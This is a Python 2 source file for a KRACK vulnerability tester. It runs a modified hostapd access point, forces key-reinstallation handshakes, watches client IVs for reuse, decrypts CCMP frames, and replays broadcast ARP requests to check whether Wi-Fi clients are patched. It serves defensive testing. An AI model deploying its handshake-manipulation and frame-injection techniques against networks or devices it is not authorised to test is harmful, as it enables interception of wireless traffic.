krack-test-client.py 23 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634
  1. #!/usr/bin/env python2
  2. import logging
  3. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  4. from scapy.all import *
  5. import sys, socket, struct, time, subprocess, atexit, select
  6. from datetime import datetime
  7. from wpaspy import Ctrl
  8. from Cryptodome.Cipher import AES
  9. # TODO: Clean up code
  10. USAGE = """{name} - Tool to test Key Reinstallation Attacks against clients
  11. To test wheter a client is vulnerable to Key Reinstallation Attack against
  12. the 4-way handshake or group key handshake, take the following steps:
  13. 1. Compile our modified hostapd instance. This only needs to be done once.
  14. cd ../hostapd
  15. cp defconfig .config
  16. make -j 2
  17. 2. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  18. with our script. So disable hardware encryption by executing:
  19. ./disable-hwcrypto.sh
  20. This only needs to be done once. It's recommended to reboot after executing
  21. this script. We tested this script with an Intel Dual Band Wireless-AC 7260
  22. and a TP-Link TL-WN722N.
  23. 3. Execute this script. Accepted parameters are:
  24. --group Test the group key handshake instead of the 4-way handshake
  25. --debug Show more debug messages
  26. All other supplied arguments are passed on to hostapd.
  27. The two examples you will always need are:
  28. {name}
  29. {name} --group
  30. The first one tests for key reinstallations in the 4-way handshake (see
  31. step 5), and the second one for key reinstallations in the group key
  32. handshake (see step 6).
  33. 4. Connect with the client being tested to the network testnetwork using
  34. password abcdefgh.
  35. Note that you can change these and other settings of the AP by modifying
  36. hostapd.conf.
  37. 5. To test key reinstallations in the 4-way handshake, the script will keep
  38. sending encrypted message 3's to the client. To start the script execute:
  39. {name}
  40. 5a. The script monitors traffic sent by the client to see if the pairwise
  41. key is being reinstalled. To assure the client is sending enough frames,
  42. you can ping the AP: ping 192.168.100.254 .
  43. If the client is vulnerable, the script will show something like:
  44. [19:02:37] 78:31:c1:c4:88:92: IV reuse detected (IV=1, seq=10). Client is vulnerable to pairwise key reinstallations in the 4-way handshake!
  45. If the client is patched, the script will show (this can take a minute):
  46. [18:58:11] 90:18:7c:6e:6b:20: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake.
  47. 5b. Once the client has requested an IP using DHCP, the script tests for
  48. reinstallations of the group key by sending broadcast ARP requests to the
  49. client using an already used (replayed) packet number (= IV). The client
  50. *must* request an IP using DHCP for this test to start.
  51. If the client is vulnerable, the script will show something like:
  52. [19:03:08] 78:31:c1:c4:88:92: Received 5 unique replies to replayed broadcast ARP requests. Client is vulnerable to group
  53. [19:03:08] key reinstallations in the 4-way handshake (or client accepts replayed broadcast frames)!
  54. If the client is patched, the script will show (this can take a minute):
  55. [19:03:08] 78:31:c1:c4:88:92: client DOESN'T seem vulnerable to group key reinstallation in the 4-way handshake handshake.
  56. Note that this scripts *indirectly* tests for reinstallations of the group
  57. key, by testing if replayed broadcast frames are accepted by the client.
  58. 6. To test key reinstallations in the group key handshake, the script will keep
  59. performing new group key handshakes using an identical (static) group key.
  60. The client *must* request an IP using DHCP for this test to start. To start
  61. the script execute:
  62. {name} --group
  63. The working and output of the script is similar to the one of step 5b.
  64. 7. Some final recommendations:
  65. 7a. Perform these tests in a room with little interference. A *high* amount
  66. of packet loss will make this script unreliable!
  67. 7b. Manually inspect network traffic to confirm the output of the script:
  68. - Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls
  69. by monitoring the IVs of frames sent by the client.
  70. - Capture traffic on the client to see if the replayed broadcast ARP
  71. requests are accepted or not.
  72. 7c. If the client can use multiple Wi-Fi radios/NICs, test using a few
  73. different ones.
  74. """
  75. # Future work:
  76. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  77. # - Ability to test the group key handshake against specific clients only
  78. # - Individual test to see if the client accepts replayed broadcast traffic (without key reinstallation)
  79. # After how many seconds a new message 3, or new group key message 1, is sent.
  80. HANDSHAKE_TRANSMIT_INTERVAL = 2
  81. #### Basic output and logging functionality ####
  82. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  83. COLORCODES = { "gray" : "\033[0;37m",
  84. "green" : "\033[0;32m",
  85. "orange": "\033[0;33m",
  86. "red" : "\033[0;31m" }
  87. global_log_level = INFO
  88. def log(level, msg, color=None, showtime=True):
  89. if level < global_log_level: return
  90. if level == DEBUG and color is None: color="gray"
  91. if level == WARNING and color is None: color="orange"
  92. if level == ERROR and color is None: color="red"
  93. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  94. #### Packet Processing Functions ####
  95. class DHCP_sock(DHCP_am):
  96. def __init__(self, **kwargs):
  97. self.sock = kwargs.pop("sock")
  98. super(DHCP_am, self).__init__(**kwargs)
  99. def send_reply(self, reply):
  100. self.sock.send(reply, **self.optsend)
  101. def print_reply(self, req, reply):
  102. log(STATUS, "%s: DHCP reply %s to %s" % (reply.getlayer(Ether).dst, reply.getlayer(IP).dst, reply.dst), color="green")
  103. def remove_client(self, clientmac):
  104. clientip = self.leases[clientmac]
  105. self.pool.append(clientip)
  106. del self.leases[clientmac]
  107. class ARP_sock(ARP_am):
  108. def __init__(self, **kwargs):
  109. self.sock = kwargs.pop("sock")
  110. super(ARP_am, self).__init__(**kwargs)
  111. def send_reply(self, reply):
  112. self.sock.send(reply, **self.optsend)
  113. def print_reply(self, req, reply):
  114. log(STATUS, "%s: ARP: %s ==> %s on %s" % (reply.getlayer(Ether).dst, req.summary(), reply.summary(), self.iff))
  115. class MitmSocket(L2Socket):
  116. def __init__(self, **kwargs):
  117. super(MitmSocket, self).__init__(**kwargs)
  118. def send(self, p):
  119. # Hack: set the More Data flag so we can detect injected frames (and so clients stay awake longer)
  120. p[Dot11].FCfield |= 0x20
  121. L2Socket.send(self, RadioTap()/p)
  122. def _strip_fcs(self, p):
  123. # Scapy can't handle the optional Frame Check Sequence (FCS) field automatically
  124. if p[RadioTap].present & 2 != 0:
  125. rawframe = str(p[RadioTap])
  126. pos = 8
  127. while ord(rawframe[pos - 1]) & 0x80 != 0: pos += 4
  128. # If the TSFT field is present, it must be 8-bytes aligned
  129. if p[RadioTap].present & 1 != 0:
  130. pos += (8 - (pos % 8))
  131. pos += 8
  132. # Remove FCS if present
  133. if ord(rawframe[pos]) & 0x10 != 0:
  134. return Dot11(str(p[Dot11])[:-4])
  135. return p[Dot11]
  136. def recv(self, x=MTU):
  137. p = L2Socket.recv(self, x)
  138. if p == None or not Dot11 in p: return None
  139. # Hack: ignore frames that we just injected and are echoed back by the kernel
  140. if p[Dot11].FCfield & 0x20 != 0:
  141. return None
  142. # Strip the FCS if present, and drop the RadioTap header
  143. return self._strip_fcs(p)
  144. def close(self):
  145. super(MitmSocket, self).close()
  146. def dot11_get_seqnum(p):
  147. return p[Dot11].SC >> 4
  148. def dot11_get_iv(p):
  149. """Scapy can't handle Extended IVs, so do this properly ourselves (only works for CCMP)"""
  150. wep = p[Dot11WEP]
  151. if wep.keyid & 32:
  152. # FIXME: Only CCMP is supported (TKIP uses a different IV structure)
  153. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (struct.unpack(">I", wep.wepdata[0:4])[0] << 16)
  154. else:
  155. return ord(wep.iv[0]) + (ord(wep.iv[1]) << 8) + (ord(wep.iv[2]) << 16)
  156. def dot11_get_priority(p):
  157. if not Dot11QoS in p: return 0
  158. return ord(str(p[Dot11QoS])[0])
  159. #### Main Testing Code ####
  160. class IvInfo():
  161. def __init__(self, p):
  162. self.iv = dot11_get_iv(p)
  163. self.seq = dot11_get_seqnum(p)
  164. self.time = p.time
  165. def is_reused(self, p):
  166. iv = dot11_get_iv(p)
  167. seq = dot11_get_seqnum(p)
  168. return self.iv == iv and self.seq != seq and p.time >= self.time + 1
  169. class ClientState():
  170. UNKNOWN, VULNERABLE, PATCHED = range(3)
  171. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  172. def __init__(self, clientmac, test_group_hs=False):
  173. self.mac = clientmac
  174. self.TK = None
  175. self.vuln_4way = ClientState.UNKNOWN
  176. self.vuln_group = ClientState.UNKNOWN
  177. # FIXME: Own variable for group handshake result?
  178. self.ivs = dict() # key is the IV value
  179. self.encdata_prev = None
  180. self.encdata_intervals = 0
  181. self.groupkey_reset()
  182. self.groupkey_grouphs = test_group_hs
  183. def groupkey_reset(self):
  184. self.groupkey_state = ClientState.IDLE
  185. self.groupkey_prev_canary_time = 0
  186. self.groupkey_num_canaries = 0
  187. self.groupkey_requests_sent = 0
  188. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  189. def start_grouphs_test():
  190. self.groupkey_reset()
  191. self.groupkey_grouphs = True
  192. def get_encryption_key(self, hostapd_ctrl):
  193. if self.TK is None:
  194. # Clear old replies and messages from the hostapd control interface
  195. while hostapd_ctrl.pending():
  196. hostapd_ctrl.recv()
  197. # Contact our modified Hostapd instrance to request the pairwise key
  198. response = hostapd_ctrl.request("GET_TK " + self.mac)
  199. if not "FAIL" in response:
  200. self.TK = response.strip().decode("hex")
  201. return self.TK
  202. def decrypt(self, p, hostapd_ctrl):
  203. # Extract encrypted payload:
  204. # - Skip extended IV (4 bytes in total)
  205. # - Exclude first 4 bytes of the CCMP MIC (note that last 4 are saved in the WEP ICV field)
  206. payload = str(p.wepdata[4:-4])
  207. llcsnap, packet = payload[:8], payload[8:]
  208. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  209. # On some kernels, the virtual interface associated to the real AP interface will return
  210. # frames where the payload is already decrypted. So if the payload seems decrypted, just
  211. # extract the full plaintext of the frame.
  212. plaintext = payload
  213. else:
  214. client = self.mac
  215. key = self.get_encryption_key(hostapd_ctrl)
  216. priority = dot11_get_priority(p)
  217. iv = dot11_get_iv(p)
  218. pn = struct.pack(">I", iv >> 16) + struct.pack(">H", iv & 0xFFFF)
  219. nonce = chr(priority) + self.mac.replace(':','').decode("hex") + pn
  220. cipher = AES.new(key, AES.MODE_CCM, nonce, mac_len=8)
  221. plaintext = cipher.decrypt(payload)
  222. return plaintext
  223. def track_used_iv(self, p):
  224. iv = dot11_get_iv(p)
  225. self.ivs[iv] = IvInfo(p)
  226. def is_iv_reused(self, p):
  227. """Returns True if this is an *observed* IV reuse"""
  228. iv = dot11_get_iv(p)
  229. return iv in self.ivs and self.ivs[iv].is_reused(p)
  230. def is_new_iv(self, p):
  231. """Returns True if the IV in this frame is higher than all previously observed ones"""
  232. iv = dot11_get_iv(p)
  233. if len(self.ivs) == 0: return True
  234. return iv > max(self.ivs.keys())
  235. def check_pairwise_reinstall(self, p):
  236. # If this is gaurenteed to be IV reuse, mark the client as vulnerable
  237. if self.is_iv_reused(p):
  238. if self.vuln_4way != ClientState.VULNERABLE:
  239. iv = dot11_get_iv(p)
  240. seq = dot11_get_seqnum(p)
  241. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  242. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  243. self.vuln_4way = ClientState.VULNERABLE
  244. # If it's a higher IV than all previous ones, try to check if the client seems patched
  245. elif self.vuln_4way == ClientState.UNKNOWN and self.is_new_iv(p):
  246. # Save how many intervals we received a data packet without IV reset. Use twice the
  247. # transmission interval of message 3, in case one message 3 is lost due to noise.
  248. if self.encdata_prev is None:
  249. self.encdata_prev = p.time
  250. elif self.encdata_prev + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  251. self.encdata_intervals += 1
  252. self.encdata_prev = p.time
  253. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  254. # If several reset attempts did not appear to reset the IV, the client is likely patched.
  255. # Wait for enough reset attempts to occur and test, to avoid giving the wrong result.
  256. if self.encdata_intervals >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  257. self.vuln_4way = ClientState.PATCHED
  258. log(INFO, "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake." % self.mac, color="green")
  259. def groupkey_handle_canary(self, p):
  260. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  261. if self.groupkey_prev_canary_time + 1 > p.time: return
  262. self.groupkey_num_canaries += 1
  263. log(DEBUG, "%s: received broadcast ARP replay number %d\n" % (self.mac, self.groupkey_num_canaries))
  264. if self.groupkey_num_canaries >= 5:
  265. assert self.vuln_group != ClientState.VULNERABLE
  266. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  267. % (self.mac, self.groupkey_num_canaries), color="green")
  268. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  269. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  270. self.vuln_group = ClientState.VULNERABLE
  271. self.groupkey_state = ClientState.FINISHED
  272. else:
  273. self.groupkey_state = ClientState.GOT_CANARY
  274. self.groupkey_prev_canary_time = p.time
  275. def groupkey_track_request(self):
  276. if self.vuln_group != ClientState.UNKNOWN: return
  277. hstype = "group key" if self.groupkey_grouphs else "4-way"
  278. if self.groupkey_state == ClientState.IDLE:
  279. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  280. self.groupkey_state = ClientState.STARTED
  281. if self.groupkey_requests_sent == 3:
  282. # Seems like the client DID reinstall the group key in this interval
  283. if self.groupkey_state == ClientState.GOT_CANARY:
  284. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  285. self.groupkey_state = ClientState.STARTED
  286. # Seems like the client DIDN'T reinstall the group key in this interval
  287. elif self.groupkey_state == ClientState.STARTED:
  288. self.groupkey_patched_intervals += 1
  289. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  290. self.groupkey_state = ClientState.STARTED
  291. self.groupkey_requests_sent = 0
  292. # If the client appears secure for several intervals, it's likely patched
  293. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  294. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  295. self.vuln_group = ClientState.PATCHED
  296. self.groupkey_state = ClientState.FINISHED
  297. self.groupkey_requests_sent += 1
  298. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  299. class KRAckAttackClient():
  300. def __init__(self, interface):
  301. self.nic_iface = interface
  302. self.nic_mon = interface + "mon"
  303. self.test_grouphs = False
  304. try:
  305. self.apmac = scapy.arch.get_if_hwaddr(interface)
  306. except:
  307. log(ERROR, "Failed to get MAC address of %s. Does this interface exist?" % interface)
  308. raise
  309. self.sock_mon = None
  310. self.sock_eth = None
  311. self.hostapd = None
  312. self.hostapd_ctrl = None
  313. self.dhcp = None
  314. self.group_ip = None
  315. self.group_arp = None
  316. self.clients = dict()
  317. def reset_client_info(self, clientmac):
  318. if clientmac in self.dhcp.leases:
  319. self.dhcp.remove_client(clientmac)
  320. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  321. if clientmac in self.clients:
  322. del self.clients[clientmac]
  323. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  324. def handle_replay(self, p):
  325. if not Dot11WEP in p: return
  326. # Reconstruct Ethernet header
  327. clientmac = p.addr2
  328. header = Ether(dst=self.apmac, src=clientmac)
  329. header.time = p.time
  330. # Decrypt the payload and obtain LLC/SNAP header and packet content
  331. client = self.clients[clientmac]
  332. plaintext = client.decrypt(p, self.hostapd_ctrl)
  333. llcsnap, packet = plaintext[:8], plaintext[8:]
  334. # Rebuild the full Ethernet packet
  335. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  336. decap = header/ARP(packet)
  337. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  338. decap = header/IP(packet)
  339. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  340. decap = header/IPv6(packet)
  341. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  342. # # EAPOL
  343. else:
  344. return
  345. # Now process the packet as if it were a valid (non-replayed) one
  346. self.process_eth_rx(decap)
  347. def handle_mon_rx(self):
  348. p = self.sock_mon.recv()
  349. if p == None: return
  350. if p.type == 1: return
  351. # Note: here we cannot verify that the NIC is indeed reusing IVs when sending the
  352. # broadcast ARP requests, because it may override them in the firmware/hardware.
  353. # The first bit in FCfield is set if the frames is "to-DS"
  354. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  355. if apmac != self.apmac: return None
  356. if Dot11Deauth in p or Dot11Disas in p:
  357. self.reset_client_info(clientmac)
  358. elif p.addr1 == self.apmac and Dot11WEP in p:
  359. if not clientmac in self.clients:
  360. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs)
  361. client = self.clients[clientmac]
  362. iv = dot11_get_iv(p)
  363. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  364. if not self.test_grouphs:
  365. client.check_pairwise_reinstall(p)
  366. if client.is_iv_reused(p):
  367. self.handle_replay(p)
  368. client.track_used_iv(p)
  369. def process_eth_rx(self, p):
  370. self.dhcp.reply(p)
  371. self.group_arp.reply(p)
  372. clientmac = p[Ether].src
  373. if not clientmac in self.clients: return
  374. client = self.clients[clientmac]
  375. if ARP in p and p[ARP].pdst == self.group_ip:
  376. client.groupkey_handle_canary(p)
  377. def handle_eth_rx(self):
  378. p = self.sock_eth.recv()
  379. if p == None or not Ether in p: return
  380. self.process_eth_rx(p)
  381. def configure_interfaces(self):
  382. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  383. # 1. Remove unused virtual interfaces to start from a clean state
  384. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  385. # 2. Configure monitor mode on interfaces
  386. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  387. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  388. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  389. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  390. time.sleep(0.5)
  391. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  392. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  393. def run(self, test_grouphs=False):
  394. self.configure_interfaces()
  395. # Open the patched hostapd instance that carries out tests and let it start
  396. log(STATUS, "Starting hostapd ...")
  397. self.hostapd = subprocess.Popen(["../hostapd/hostapd", "hostapd.conf"] + sys.argv[1:])
  398. time.sleep(1)
  399. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  400. self.hostapd_ctrl.attach()
  401. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  402. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  403. # Let scapy handle DHCP requests
  404. self.dhcp = DHCP_sock(sock=self.sock_eth,
  405. domain='krackattack.com',
  406. pool=Net('192.168.100.0/24'),
  407. network='192.168.100.0/24',
  408. gw='192.168.100.254',
  409. renewal_time=600, lease_time=3600)
  410. # Configure gateway IP: reply to ARP and ping requests
  411. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  412. self.group_ip = self.dhcp.pool.pop()
  413. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  414. # Inform hostapd that we are testing the group key, if applicalbe
  415. if test_grouphs:
  416. self.hostapd_ctrl.request("START_GROUP_TESTS")
  417. self.test_grouphs = True
  418. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  419. # Monitor the virtual monitor interface of the AP and perform the needed actions
  420. self.next_arp = time.time() + 1
  421. while True:
  422. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  423. if self.sock_mon in sel[0]: self.handle_mon_rx()
  424. if self.sock_eth in sel[0]: self.handle_eth_rx()
  425. if time.time() > self.next_arp:
  426. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  427. for client in self.clients.values():
  428. # Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  429. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  430. clientip = self.dhcp.leases[client.mac]
  431. client.groupkey_track_request()
  432. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  433. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  434. self.sock_eth.send(request)
  435. def stop(self):
  436. log(STATUS, "Closing hostapd and cleaning up ...")
  437. if self.hostapd:
  438. self.hostapd.terminate()
  439. self.hostapd.wait()
  440. if self.sock_mon: self.sock_mon.close()
  441. if self.sock_eth: self.sock_eth.close()
  442. def cleanup():
  443. attack.stop()
  444. def argv_get_interface():
  445. for i in range(len(sys.argv)):
  446. if not sys.argv[i].startswith("-i"):
  447. continue
  448. if len(sys.argv[i]) > 2:
  449. return sys.argv[i][2:]
  450. else:
  451. return sys.argv[i + 1]
  452. return None
  453. def argv_pop_argument(argument):
  454. if not argument in sys.argv: return False
  455. idx = sys.argv.index(argument)
  456. del sys.argv[idx]
  457. return True
  458. def hostapd_read_config(config):
  459. # Read the config, get the interface name, and verify some settings.
  460. interface = None
  461. with open(config) as fp:
  462. for line in fp.readlines():
  463. line = line.strip()
  464. if line.startswith("interface="):
  465. interface = line.split('=')[1]
  466. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  467. if "TKIP" in line:
  468. log(ERROR, "ERROR: This scripts only support tests using CCMP. Only include CCMP in the following config line:")
  469. log(ERROR, " >%s<" % line, showtime=False)
  470. quit(1)
  471. # Parameter -i overrides interface in config.
  472. # FIXME: Display warning when multiple interfaces are used.
  473. if argv_get_interface() is not None:
  474. interface = argv_get_interface()
  475. return interface
  476. if __name__ == "__main__":
  477. if "--help" in sys.argv or "-h" in sys.argv:
  478. print USAGE.format(name=sys.argv[0])
  479. quit(1)
  480. test_grouphs = argv_pop_argument("--group")
  481. while argv_pop_argument("--debug"):
  482. global_log_level -= 1
  483. try:
  484. interface = hostapd_read_config("hostapd.conf")
  485. except Exception as ex:
  486. log(ERROR, "Failed to parse the hostapd config file")
  487. raise
  488. if not interface:
  489. log(ERROR, "Failed to determine wireless interface. Specify one in the hostapd config file.")
  490. quit(1)
  491. attack = KRAckAttackClient(interface)
  492. atexit.register(cleanup)
  493. attack.run(test_grouphs=test_grouphs)